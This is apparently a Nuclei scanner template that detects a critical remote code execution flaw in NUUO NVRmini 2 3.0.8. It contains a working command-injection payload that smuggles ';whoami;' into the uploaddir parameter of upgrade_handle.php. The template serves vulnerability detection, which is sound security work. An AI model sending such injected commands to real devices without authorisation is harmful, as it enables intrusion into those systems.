id: nuuo-nvrmini2-rce

info:
  name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
  author: berkdusunur
  severity: critical
  description: |
    NUUO NVRmini 2 3.0.8 is susceptible to remote code execution.
  reference:
    - https://www.exploit-db.com/exploits/45070
    - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
    - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: rce,nuuo,nvrmini,edb,packetstorm

requests:
  - method: GET
    path:
      - "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/upload_tmp_dir/"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
